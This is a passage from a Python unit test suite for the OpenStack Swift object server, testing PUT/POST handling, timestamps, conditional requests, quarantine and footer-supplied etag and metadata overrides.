            'X-Container-Host': 'chost:cport',
            'X-Container-Partition': 'cpartition',
            'X-Container-Device': 'cdevice'}
        req = Request.blank('/sda1/p/a/c/o',
                            environ={'REQUEST_METHOD': 'POST'},
                            headers=post_headers)
        with mock.patch('swift.obj.server.http_connect', fake_http_connect), \
                mock.patch('swift.common.utils.HASH_PATH_PREFIX', ''), \
                fake_spawn():
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 202)
        self.maxDiff = None
        # check async pending file for PUT is still intact
        self.assertDictEqual(
            pickle.load(open(async_pending_file_put)),
            {'headers': expected_put_headers,
             'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
        # check distinct async pending file for POST
        async_pending_file_post = os.path.join(
            device_dir, diskfile.get_async_dir(policy), 'a83',
            '06fbf0b514e5199dfc4e00f42eb5ea83-%s' % t_post.internal)
        self.assertTrue(os.path.isfile(async_pending_file_post),
                        'Expected %s to be a file but it is not.'
                        % async_pending_file_post)
        # note: X-Timestamp stays at the PUT's value (the data file's
        # timestamp); only the meta/content-type timestamps move to t_post
        expected_post_headers = {
            'Referer': 'POST http://localhost/sda1/p/a/c/o',
            'X-Trans-Id': 'post_trans_id',
            'X-Timestamp': t_put.internal,
            'X-Content-Type': 'application/other;swift_bytes=123456789',
            'X-Size': '4',
            'X-Etag': '098f6bcd4621d373cade4e832627b4f6',
            'User-Agent': 'object-server %s' % os.getpid(),
            'X-Backend-Storage-Policy-Index': '%d' % int(policy),
            'X-Meta-Timestamp': t_post.internal,
            'X-Content-Type-Timestamp': t_post.internal,
        }
        if policy.policy_type == EC_POLICY:
            expected_post_headers['X-Etag'] = update_etag
        self.assertDictEqual(
            pickle.load(open(async_pending_file_post)),
            {'headers': expected_post_headers,
             'account': 'a', 'container': 'c', 'obj': 'o', 'op': 'PUT'})
        # verify that only the POST (most recent) async update gets sent by the
        # object updater, and that both update files are deleted
        with mock.patch(
            'swift.obj.updater.ObjectUpdater.object_update') as mock_update, \
                mock.patch('swift.obj.updater.dump_recon_cache'):
            object_updater = updater.ObjectUpdater(
                {'devices': self.testdir,
                 'mount_check': 'false'}, logger=debug_logger())
            node = {'id': 1}
            mock_ring = mock.MagicMock()
            mock_ring.get_nodes.return_value = (99, [node])
            object_updater.container_ring = mock_ring
            mock_update.return_value = ((True, 1))
            object_updater.run_once()
        self.assertEqual(1, mock_update.call_count)
        self.assertEqual((node, 99, 'PUT', '/a/c/o'),
                         mock_update.call_args_list[0][0][0:4])
        actual_headers = mock_update.call_args_list[0][0][4]
        # User-Agent is updated.
        expected_post_headers['User-Agent'] = 'object-updater %s' % os.getpid()
        self.assertDictEqual(expected_post_headers, actual_headers)
        self.assertFalse(
            os.listdir(os.path.join(
                device_dir, diskfile.get_async_dir(policy))))
    def test_PUT_then_POST_async_pendings_with_repl_policy(self):
        # replication policy: no etag override is involved
        self._test_PUT_then_POST_async_pendings(POLICIES[0])
    def test_PUT_then_POST_async_pendings_with_EC_policy(self):
        # EC policy: the async updates must carry the overridden
        # whole-object etag rather than the fragment etag
        self._test_PUT_then_POST_async_pendings(
            POLICIES[1], update_etag='override_etag')
    def test_POST_quarantine_zbyte(self):
        # A .data file truncated to zero bytes (but still carrying its
        # original metadata) is quarantined when the POST opens it, and
        # the POST then sees no object at all (404).
        timestamp = normalize_timestamp(time())
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': timestamp,
                                     'Content-Type': 'application/x-test'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        objfile = self.df_mgr.get_diskfile('sda1', 'p', 'a', 'c', 'o',
                                           policy=POLICIES.legacy)
        objfile.open()
        file_name = os.path.basename(objfile._data_file)
        # rewrite the data file with the same metadata but an empty body,
        # leaving a zero-byte file whose metadata still describes 'VERIFY'
        with open(objfile._data_file) as fp:
            metadata = diskfile.read_metadata(fp)
        os.unlink(objfile._data_file)
        with open(objfile._data_file, 'w') as fp:
            diskfile.write_metadata(fp, metadata)
        # sanity: the (corrupt) data file is still in place
        self.assertEqual(os.listdir(objfile._datadir)[0], file_name)
        req = Request.blank(
            '/sda1/p/a/c/o',
            environ={'REQUEST_METHOD': 'POST'},
            headers={'X-Timestamp': normalize_timestamp(time())})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        # the corrupt file must have been moved to the quarantine area
        quar_dir = os.path.join(
            self.testdir, 'sda1', 'quarantined', 'objects',
            os.path.basename(os.path.dirname(objfile._data_file)))
        self.assertEqual(os.listdir(quar_dir)[0], file_name)
def test_PUT_invalid_path(self):
req = Request.blank('/sda1/p/a/c', environ={'REQUEST_METHOD': 'PUT'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_timestamp(self):
req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT',
'CONTENT_LENGTH': '0'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_bad_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 'bad'})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_content_type(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_invalid_content_type(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '6',
'Content-Type': '\xff\xff'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
self.assertTrue('Content-Type' in resp.body)
def test_PUT_no_content_length(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
del req.headers['Content-Length']
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 411)
def test_PUT_zero_content_length(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = ''
self.assertEqual(req.headers['Content-Length'], '0')
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_bad_transfer_encoding(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
req.headers['Transfer-Encoding'] = 'bad'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_if_none_match_star(self):
# First PUT should succeed
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# File should already exist so it should fail
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
req = Request.blank('/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': next(self.ts).normal})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': next(self.ts).normal,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '*'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_if_none_match(self):
# PUT with if-none-match set and nothing there should succeed
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': 'notthere'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# PUT with if-none-match of the object etag should fail
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'If-None-Match': '0b4c12d7e0a73840c1c4f148fda3b037'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
    def test_PUT_if_none_match_but_expired(self):
        # If-None-Match: * must treat an expired object as absent.
        # The timestamps are drawn in increasing order, so the expiry
        # (delete_at_timestamp) falls after put_before_expire and before
        # time_after_expire.
        inital_put = next(self.ts)
        put_before_expire = next(self.ts)
        delete_at_timestamp = int(next(self.ts))
        time_after_expire = next(self.ts)
        put_after_expire = next(self.ts)
        # round down to the containing expiring-objects container
        # (NOTE(review): relies on Python 2 integer floor division — the
        # divisor is presumably an int; confirm if porting to Python 3)
        delete_at_container = str(
            delete_at_timestamp /
            self.object_controller.expiring_objects_container_divisor *
            self.object_controller.expiring_objects_container_divisor)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': inital_put.normal,
                     'X-Delete-At': str(delete_at_timestamp),
                     'X-Delete-At-Container': delete_at_container,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'TEST'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # PUT again before object has expired should fail
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': put_before_expire.normal,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'If-None-Match': '*'})
        req.body = 'TEST'
        # pin the server's clock to a moment before expiry
        with mock.patch("swift.obj.server.time.time",
                        lambda: float(put_before_expire.normal)):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 412)
        # PUT again after object has expired should succeed
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': put_after_expire.normal,
                     'Content-Length': '4',
                     'Content-Type': 'application/octet-stream',
                     'If-None-Match': '*'})
        req.body = 'TEST'
        # pin the server's clock to a moment after expiry
        with mock.patch("swift.obj.server.time.time",
                        lambda: float(time_after_expire.normal)):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
def test_PUT_common(self):
timestamp = normalize_timestamp(time())
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp,
'Content-Length': '6',
'Content-Type': 'application/octet-stream',
'x-object-meta-test': 'one',
'Custom-Header': '*',
'X-Backend-Replication-Headers':
'Content-Type Content-Length'})
req.body = 'VERIFY'
with mock.patch.object(self.object_controller, 'allowed_headers',
['Custom-Header']):
self.object_controller.allowed_headers = ['Custom-Header']
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]),
'p', hash_path('a', 'c', 'o')),
utils.Timestamp(timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
self.assertEqual(open(objfile).read(), 'VERIFY')
self.assertEqual(diskfile.read_metadata(objfile),
{'X-Timestamp': utils.Timestamp(timestamp).internal,
'Content-Length': '6',
'ETag': '0b4c12d7e0a73840c1c4f148fda3b037',
'Content-Type': 'application/octet-stream',
'name': '/a/c/o',
'X-Object-Meta-Test': 'one',
'Custom-Header': '*'})
    def test_PUT_overwrite(self):
        # A newer PUT completely replaces the stored body and metadata of
        # an earlier PUT.
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'Content-Length': '6',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # guarantee the second request's timestamp is strictly newer
        sleep(.00001)
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # the surviving .data file is named for the second timestamp
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY TWO')
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': utils.Timestamp(timestamp).internal,
                          'Content-Length': '10',
                          'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
                          'Content-Type': 'text/plain',
                          'name': '/a/c/o',
                          'Content-Encoding': 'gzip'})
    def test_PUT_overwrite_to_older_ts_success(self):
        # A PUT whose timestamp is newer than an existing tombstone
        # succeeds and replaces it.
        old_timestamp = next(self.ts)
        new_timestamp = next(self.ts)
        # DELETE of a nonexistent object returns 404 but still writes a
        # tombstone at old_timestamp
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': old_timestamp.normal,
                     'Content-Length': '0',
                     'Content-Type': 'application/octet-stream'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': new_timestamp.normal,
                     'Content-Type': 'text/plain',
                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # a .data file named for the PUT timestamp must now exist
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            new_timestamp.internal + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY TWO')
        self.assertEqual(
            diskfile.read_metadata(objfile),
            {'X-Timestamp': new_timestamp.internal,
             'Content-Length': '10',
             'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
             'Content-Type': 'text/plain',
             'name': '/a/c/o',
             'Content-Encoding': 'gzip'})
    def test_PUT_overwrite_to_newer_ts_failed(self):
        # A PUT whose timestamp is older than an existing tombstone is
        # rejected with 409 before any diskfile is even created.
        old_timestamp = next(self.ts)
        new_timestamp = next(self.ts)
        # DELETE of a nonexistent object returns 404 but still writes a
        # tombstone at new_timestamp
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'DELETE'},
            headers={'X-Timestamp': new_timestamp.normal,
                     'Content-Length': '0',
                     'Content-Type': 'application/octet-stream'})
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 404)
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': old_timestamp.normal,
                     'Content-Type': 'text/plain',
                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        # spy on diskfile creation to prove the PUT short-circuits
        with mock.patch(
                'swift.obj.diskfile.BaseDiskFile.create') as mock_create:
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(mock_create.call_count, 0)
        # data file doesn't exist there (This is sanity because
        # if .data written unexpectedly, it will be removed
        # by cleanup_ondisk_files)
        datafile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            old_timestamp.internal + '.data')
        self.assertFalse(os.path.exists(datafile))
        # ts file sitll exists
        tsfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            new_timestamp.internal + '.ts')
        self.assertTrue(os.path.isfile(tsfile))
    def test_PUT_overwrite_w_delete_at(self):
        # Overwriting an object that had X-Delete-At drops the expiry:
        # the new diskfile metadata contains no X-Delete-At key.
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': normalize_timestamp(time()),
                     'X-Delete-At': 9999999999,
                     'Content-Length': '6',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # guarantee the second request's timestamp is strictly newer
        sleep(.00001)
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY TWO')
        # note: no X-Delete-At in the surviving metadata
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': utils.Timestamp(timestamp).internal,
                          'Content-Length': '10',
                          'ETag': 'b381a4c5dab1eaa1eb9711fa647cd039',
                          'Content-Type': 'text/plain',
                          'name': '/a/c/o',
                          'Content-Encoding': 'gzip'})
    def test_PUT_old_timestamp(self):
        # A PUT with a timestamp equal to or older than the stored object
        # is rejected with 409, and the response exposes the winning
        # timestamp in X-Backend-Timestamp.
        ts = time()
        orig_timestamp = utils.Timestamp(ts).internal
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': orig_timestamp,
                     'Content-Length': '6',
                     'Content-Type': 'application/octet-stream'})
        req.body = 'VERIFY'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        # same timestamp: conflict
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={'X-Timestamp': normalize_timestamp(ts),
                                     'Content-Type': 'text/plain',
                                     'Content-Encoding': 'gzip'})
        req.body = 'VERIFY TWO'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
        # strictly older timestamp: also conflict
        req = Request.blank('/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
                            headers={
                                'X-Timestamp': normalize_timestamp(ts - 1),
                                'Content-Type': 'text/plain',
                                'Content-Encoding': 'gzip'})
        req.body = 'VERIFY THREE'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 409)
        self.assertEqual(resp.headers['X-Backend-Timestamp'], orig_timestamp)
def test_PUT_new_object_really_old_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '-1', # 1969-12-31 23:59:59
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '1', # 1970-01-01 00:00:01
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_object_really_new_timestamp(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '9999999999', # 2286-11-20 17:46:40
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# roll over to 11 digits before the decimal
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '10000000000',
'Content-Length': '6',
'Content-Type': 'application/octet-stream'})
req.body = 'VERIFY'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 400)
def test_PUT_no_etag(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'text/plain'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
def test_PUT_invalid_etag(self):
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'text/plain',
'ETag': 'invalid'})
req.body = 'test'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 422)
    def test_PUT_user_metadata(self):
        # X-Object-Meta-* request headers are persisted verbatim in the
        # diskfile metadata alongside the system fields.
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
                     'X-Object-Meta-1': 'One',
                     'X-Object-Meta-Two': 'Two'})
        req.body = 'VERIFY THREE'
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.data')
        self.assertTrue(os.path.isfile(objfile))
        self.assertEqual(open(objfile).read(), 'VERIFY THREE')
        self.assertEqual(diskfile.read_metadata(objfile),
                         {'X-Timestamp': utils.Timestamp(timestamp).internal,
                          'Content-Length': '12',
                          'ETag': 'b114ab7b90d9ccac4bd5d99cc7ebb568',
                          'Content-Type': 'text/plain',
                          'name': '/a/c/o',
                          'X-Object-Meta-1': 'One',
                          'X-Object-Meta-Two': 'Two'})
    def test_PUT_etag_in_footer(self):
        # With X-Backend-Obj-Metadata-Footer the body is a MIME document;
        # the Etag in the footer part wins over the (bogus) Etag header.
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Transfer-Encoding': 'chunked',
                     'Etag': 'other-etag',
                     'X-Backend-Obj-Metadata-Footer': 'yes',
                     'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
            environ={'REQUEST_METHOD': 'PUT'})
        obj_etag = md5("obj data").hexdigest()
        footer_meta = json.dumps({"Etag": obj_etag})
        # the footer document is integrity-checked via its Content-MD5
        footer_meta_cksum = md5(footer_meta).hexdigest()
        req.body = "\r\n".join((
            "--boundary",
            "",
            "obj data",
            "--boundary",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_meta,
            "--boundary--",
        ))
        req.headers.pop("Content-Length", None)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.etag, obj_etag)
        self.assertEqual(resp.status_int, 201)
        # only the first MIME part (the object data) lands in the .data file
        objfile = os.path.join(
            self.testdir, 'sda1',
            storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
                              hash_path('a', 'c', 'o')),
            utils.Timestamp(timestamp).internal + '.data')
        with open(objfile) as fh:
            self.assertEqual(fh.read(), "obj data")
    def _check_container_override_etag_preference(self, override_headers,
                                                  override_footers):
        # Send a footered PUT carrying the given override headers/footers
        # and assert the container update reports X-Etag 'update-etag' --
        # i.e. the expected override source won.
        def mock_container_update(ctlr, op, account, container, obj, req,
                                  headers_out, objdevice, policy):
            # capture what the object server would have sent to the
            # container server
            calls_made.append((headers_out, policy))
        calls_made = []
        ts_put = next(self.ts)
        headers = {
            'X-Timestamp': ts_put.internal,
            'Content-Type': 'text/plain',
            'Transfer-Encoding': 'chunked',
            'Etag': 'other-etag',
            'X-Backend-Obj-Metadata-Footer': 'yes',
            'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'}
        headers.update(override_headers)
        req = Request.blank(
            '/sda1/p/a/c/o', headers=headers,
            environ={'REQUEST_METHOD': 'PUT'})
        obj_etag = md5("obj data").hexdigest()
        footers = {'Etag': obj_etag}
        footers.update(override_footers)
        footer_meta = json.dumps(footers)
        footer_meta_cksum = md5(footer_meta).hexdigest()
        req.body = "\r\n".join((
            "--boundary",
            "",
            "obj data",
            "--boundary",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_meta,
            "--boundary--",
        ))
        req.headers.pop("Content-Length", None)
        with mock.patch(
                'swift.obj.server.ObjectController.container_update',
                mock_container_update):
            resp = req.get_response(self.object_controller)
        self.assertEqual(resp.etag, obj_etag)
        self.assertEqual(resp.status_int, 201)
        self.assertEqual(1, len(calls_made))
        # whichever override won must have produced X-Etag 'update-etag'
        self.assertEqual({
            'X-Size': str(len('obj data')),
            'X-Etag': 'update-etag',
            'X-Content-Type': 'text/plain',
            'X-Timestamp': ts_put.internal,
        }, calls_made[0][0])
        self.assertEqual(POLICIES[0], calls_made[0][1])
def test_override_etag_lone_header_footer(self):
self._check_container_override_etag_preference(
{'X-Backend-Container-Update-Override-Etag': 'update-etag'}, {})
self._check_container_override_etag_preference(
{}, {'X-Backend-Container-Update-Override-Etag': 'update-etag'})
self._check_container_override_etag_preference(
{'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}, {})
self._check_container_override_etag_preference(
{}, {'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}),
def test_override_etag_footer_trumps_header(self):
self._check_container_override_etag_preference(
{'X-Backend-Container-Update-Override-Etag': 'ignored-etag'},
{'X-Backend-Container-Update-Override-Etag': 'update-etag'})
self._check_container_override_etag_preference(
{'X-Object-Sysmeta-Container-Update-Override-Etag':
'ignored-etag'},
{'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'})
def test_override_etag_sysmeta_trumps_backend(self):
self._check_container_override_etag_preference(
{'X-Backend-Container-Update-Override-Etag': 'ignored-etag',
'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}, {})
self._check_container_override_etag_preference(
{}, {'X-Backend-Container-Update-Override-Etag': 'ignored-etag',
'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'})
def test_override_etag_sysmeta_header_trumps_backend_footer(self):
headers = {'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}
footers = {'X-Backend-Container-Update-Override-Etag':
'ignored-etag'}
self._check_container_override_etag_preference(headers, footers)
def test_override_etag_sysmeta_footer_trumps_backend_header(self):
headers = {'X-Backend-Container-Update-Override-Etag':
'ignored-etag'}
footers = {'X-Object-Sysmeta-Container-Update-Override-Etag':
'update-etag'}
self._check_container_override_etag_preference(headers, footers)
    def test_PUT_etag_in_footer_mismatch(self):
        # A footer Etag that doesn't match the uploaded data ('blue' vs
        # the md5 of 'green') makes the PUT fail with 422.
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Transfer-Encoding': 'chunked',
                     'X-Backend-Obj-Metadata-Footer': 'yes',
                     'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
            environ={'REQUEST_METHOD': 'PUT'})
        footer_meta = json.dumps({"Etag": md5("green").hexdigest()})
        footer_meta_cksum = md5(footer_meta).hexdigest()
        req.body = "\r\n".join((
            "--boundary",
            "",
            "blue",
            "--boundary",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_meta,
            "--boundary--",
        ))
        req.headers.pop("Content-Length", None)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 422)
    def test_PUT_meta_in_footer(self):
        # Metadata supplied in the MIME footer overrides the same keys
        # supplied as request headers, for both user meta and sysmeta.
        timestamp = normalize_timestamp(time())
        req = Request.blank(
            '/sda1/p/a/c/o',
            headers={'X-Timestamp': timestamp,
                     'Content-Type': 'text/plain',
                     'Transfer-Encoding': 'chunked',
                     'X-Object-Meta-X': 'Z',
                     'X-Object-Sysmeta-X': 'Z',
                     'X-Backend-Obj-Metadata-Footer': 'yes',
                     'X-Backend-Obj-Multipart-Mime-Boundary': 'boundary'},
            environ={'REQUEST_METHOD': 'PUT'})
        # footer says 'Y' where the headers said 'Z'
        footer_meta = json.dumps({
            'X-Object-Meta-X': 'Y',
            'X-Object-Sysmeta-X': 'Y',
        })
        footer_meta_cksum = md5(footer_meta).hexdigest()
        req.body = "\r\n".join((
            "--boundary",
            "",
            "stuff stuff stuff",
            "--boundary",
            "Content-MD5: " + footer_meta_cksum,
            "",
            footer_meta,
            "--boundary--",
        ))
        req.headers.pop("Content-Length", None)
        resp = req.get_response(self.object_controller)
        self.assertEqual(resp.status_int, 201)
